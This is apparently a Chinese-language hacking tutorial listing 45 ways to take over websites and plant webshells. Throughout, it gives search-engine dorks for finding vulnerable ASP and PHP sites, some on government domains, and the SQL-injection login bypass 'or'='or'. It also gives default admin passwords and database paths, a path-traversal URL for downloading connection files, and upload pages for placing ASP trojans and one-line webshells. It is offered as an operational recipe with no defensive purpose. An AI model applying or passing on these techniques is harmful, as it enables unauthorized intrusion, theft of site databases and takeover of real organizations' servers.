241 lines
		
	
	
		
			6.3 KiB
		
	
	
	
		
			Plaintext
		
	
	
			
		
		
	
	
			241 lines
		
	
	
		
			6.3 KiB
		
	
	
	
		
			Plaintext
		
	
	
| #gain-webshell
 | ||
| 
 | ||
| 1中国黑客部教程,首先到GoogLe,搜索一些关键字,edit.asp?   韩国肉鸡为多,多数为MSSQL数据库!
 | ||
| 
 | ||
| 2到Google ,site:cq.cn inurl:asp
 | ||
| 
 | ||
| 3,利用挖掘鸡和一个ASP木马.
 | ||
| 文件名是login.asp
 | ||
| 路径组是/manage/
 | ||
| 关键词是went.asp
 | ||
| 用'or'='or'来登陆
 | ||
| 
 | ||
| 4,关键字:Co Net MIB Ver 1.0网站后台管理系统
 | ||
| 帐号密码为 'or'='or'
 | ||
| 
 | ||
| 5.动感购物系统
 | ||
| inurl:help.asp登陆,如未注册成为会员!
 | ||
| 
 | ||
| upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
 | ||
| 
 | ||
| 
 | ||
| 6。默认数据库地址blogdata/acblog.asa
 | ||
| 关键字:acblog
 | ||
| 
 | ||
| 7.百度 /htdocs
 | ||
| 注册里可以直接上传asa文件!
 | ||
| 
 | ||
| 
 | ||
| 8./Database/#newasp.mdb
 | ||
| 关键词:NewAsp SiteManageSystem Version
 | ||
| 
 | ||
| 
 | ||
| 9.用挖掘机           
 | ||
| 关键字:Powered by WEBBOY
 | ||
| 页面:/upfile.asp
 | ||
| 
 | ||
| 10.baidu中搜索关键字Ver5.0 Build 0519
 | ||
| (存在上传漏洞)
 | ||
| 
 | ||
| 11.Upfile_Article.asp bbs/upfile.asp 
 | ||
| 输入关键字:powered by mypower ,
 | ||
| 
 | ||
| 12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
 | ||
| 
 | ||
| 13.现在GOOGLE搜索关键字   intitle:网站小助手 inurl:asp 
 | ||
| 
 | ||
| 14.键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
 | ||
| 
 | ||
| 挖掘鸡的关键字 添   setup.asp
 | ||
| 
 | ||
| 15.VBulletin论坛的数据库
 | ||
| 默认数据库地址!
 | ||
| /includes/functions.php
 | ||
| 工具:
 | ||
| 1.网站猎手 下载地址:百度 Google!
 | ||
| 2.Google
 | ||
| 关键字:
 | ||
| Powered by: vBulletin Version 3.0.1
 | ||
| Powered by: vBulletin Version 3.0.2
 | ||
| Powered by: vBulletin Version 3.0.3
 | ||
| 其中一个就可以了
 | ||
| 
 | ||
| 16.shopping cart 
 | ||
| 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart 
 | ||
| open source。 这是一个商场系统。
 | ||
| 2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
 | ||
| 猜到,comersus.mdb. 是数据库名
 | ||
| 数据库都是放在database/ 后的,
 | ||
| 所以database/comersus.mdb 
 | ||
| comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
 | ||
| 那样把前一个''store/''除去,再加上database/comersus.mdb 试试
 | ||
| 
 | ||
| 17.无忧传奇官方站点程序。
 | ||
|       1、后台管理地址:http://您的域名/msmiradmin/
 | ||
|       2、默认后台管理帐号:msmir
 | ||
|       3、默认后台管理密码:msmirmsmir
 | ||
| 数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
 | ||
| 数据库连接文件为 ***********/Conn.asp
 | ||
| 
 | ||
| 18.百度里输入/skins/default/
 | ||
| 
 | ||
| 19.利用挖掘机
 | ||
| 关键机:power by Discuz
 | ||
| 路径:/wish.php
 | ||
| 配合:
 | ||
| Discuz!论坛 wish.php远程包含漏洞 工具使用
 | ||
| 
 | ||
| 20.上传漏洞.
 | ||
| 工具 : Domain3.5
 | ||
|     网站猎手 1.5版
 | ||
| 关键字powered by mypower
 | ||
| 检测的页面或文件插入upfile_photo.asp
 | ||
| 
 | ||
| 
 | ||
| 21.新云漏洞
 | ||
| 这个漏洞ACCESS和SQL版通吃。
 | ||
| Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
 | ||
| 把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
 | ||
| 以源码,软件等下载站居多。
 | ||
| 大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
 | ||
| \database\%23newasp.mdb
 | ||
| 如:#xzws.mdb 改成%23xzws.mdb
 | ||
| 
 | ||
| 22.通吃所有商城+动力上传系统
 | ||
| 
 | ||
| 使用工具:挖掘鸡 v1.1 明小子
 | ||
| 商城入侵:
 | ||
| 关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
 | ||
| 漏洞页面:upload.asp   
 | ||
|       upfile_flash.asp
 | ||
| 
 | ||
| 动力入侵:
 | ||
| 关键字:powered by mypower
 | ||
| 漏洞页面:upfile_photo.asp
 | ||
|       Upfile_Soft.asp
 | ||
|       upfile_adpic.asp
 | ||
|       upfile_softpic.asp
 | ||
| 
 | ||
| 23.注射漏洞
 | ||
| 百度搜索ioj's blog
 | ||
| 
 | ||
| 24动易
 | ||
| 列目录
 | ||
| admin_articlerecyclebin.asp 
 | ||
| inurl:admin_articlerecyclebin.asp 
 | ||
| 
 | ||
| 25.manage/login
 | ||
| 工具:网站猎手
 | ||
| 关键词:inurl:Went.asp
 | ||
| 后缀:manage/login.asp
 | ||
| 口令:'or'='or'
 | ||
| 
 | ||
| 26.入侵魔兽私服
 | ||
| 需要的工具:ASP木马一只。
 | ||
|         Domain3.5明小子
 | ||
| 关键字:All Right Reserved Design:游戏联盟
 | ||
| 后台地址:admin/login.asp
 | ||
| 数据库的地址:chngame/#chngame.mdb
 | ||
| 
 | ||
| 27.漏洞是利用管理员iis设置的失误
 | ||
| 用baidu 关键字就是比较罕见的脚本名
 | ||
| 动网: ReloadForumCache.asp
 | ||
| Leadbbs: makealltopanc.asp
 | ||
| BBSXP: admin_fso.asp
 | ||
| 动易: admin_articlerecyclebin.asp
 | ||
| 
 | ||
| 28.国外站的爆库漏洞
 | ||
| 关键字:sad Raven's Guestbook
 | ||
| 密码地址:/passwd.dat
 | ||
| 后台地址:/admin.php
 | ||
| 
 | ||
| 29.Discuz 4.1.0跨站漏洞
 | ||
| 利用工具:1,WAP浏览器
 | ||
|       2,WAP编码转换器
 | ||
| 关键字:"intextiscuz! 4.1.0"
 | ||
| 
 | ||
| 30.关键字:尚奈克斯
 | ||
| 后台路径/system/manage.asp 
 | ||
| 直接传ASP木马
 | ||
| 
 | ||
| 31.工具
 | ||
| 1:网站猎手
 | ||
| 2:大马一个
 | ||
| 关键字:切勿关闭Cookies功能,否则您将不能登录
 | ||
| 插入diy.asp
 | ||
| 
 | ||
| 32.
 | ||
| 关键字:Team5 Studio All rights reserved
 | ||
| 默认数据库:data/team.mdb 
 | ||
| 
 | ||
| 33.
 | ||
| 工具:   挖掘机 辅臣数据库读取器
 | ||
| 关键字:   企业简介 产品展示 产品列表
 | ||
| 后缀添加: /database/myszw.mdb
 | ||
| 后台地址: admin/Login.asp
 | ||
| 
 | ||
| 34.
 | ||
| 关键子   XXX inurl:Nclass.asp
 | ||
| 在"系统设置"里写个木马。
 | ||
| 会被保存到 在 config.asp内。
 | ||
| 
 | ||
| 35.
 | ||
| 不进后台照样拿动网WEBSHELL
 | ||
| data.asp?action=BackupData       动网数据库备份默认路径
 | ||
| 
 | ||
| 36.
 | ||
| 工具:网站猎手 WebShell
 | ||
| 关键字:inurl:Went.asp
 | ||
| 后缀:manage/login.asp
 | ||
| 弱口令:'or'='or'
 | ||
| 
 | ||
| 37.
 | ||
| 关键字owered byCDN_NEWS
 | ||
| 随便扫遍文章加一个' ,来试探注入点
 | ||
| 后台地址:admin_index.asp
 | ||
| 
 | ||
| 38.
 | ||
| 入侵雷池新闻发布系统
 | ||
| 关键字:leichinews
 | ||
| 去掉leichinews后面的.
 | ||
| 打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
 | ||
| 再上传马.....
 | ||
| 进访问uppic anran.asp 登陆马.
 | ||
| 
 | ||
| 39.
 | ||
| 关键字ower System Of Article Management Ver 3.0 Build 20030628
 | ||
| 默认数据库:database\yiuwekdsodksldfslwifds.mdb 
 | ||
| 后台地址:自己扫描!
 | ||
| 
 | ||
| 40.
 | ||
| 一、通过GOOGLE搜索找大量注入点
 | ||
| 关键字:asp?id=1   gov.jp/ asp?id=
 | ||
| 页数:100
 | ||
| 语言:想入侵哪个国家就填什么语言吧
 | ||
| 
 | ||
| 41.
 | ||
| 关键字:Powered by:94KKBBS 2005
 | ||
| 利用密码找回功能 找回admin
 | ||
| 提问:ddddd 回答:ddddd
 | ||
| 
 | ||
| 42.
 | ||
| 关键字:inurl:Went.asp
 | ||
| 后台为manage/login.asp
 | ||
| 后台密码: 'or'=' 或者 'or''=''or' 登录 进入
 | ||
| 默认数据库地址atabase/DataShop.mdb
 | ||
| 
 | ||
| 43.
 | ||
| 关键字:****** inurl:readnews.asp
 | ||
| 把最后一个/改成%5c ,直接暴库,看密码,进后台
 | ||
| 随便添加个新闻 在标题输入我们的一句话木马
 | ||
| 
 | ||
| 44.
 | ||
| 工具:一句话木马
 | ||
|   BBsXp 5.0 sp1 管理员猜解器
 | ||
| 关键词:powered by bbsxp5.00
 | ||
| 进后台,备份一句话马!
 | ||
| 
 | ||
| 45.
 | ||
| 关键字:程序核心:BJXSHOP网上开店专家 
 | ||
| 后台:/admin
 |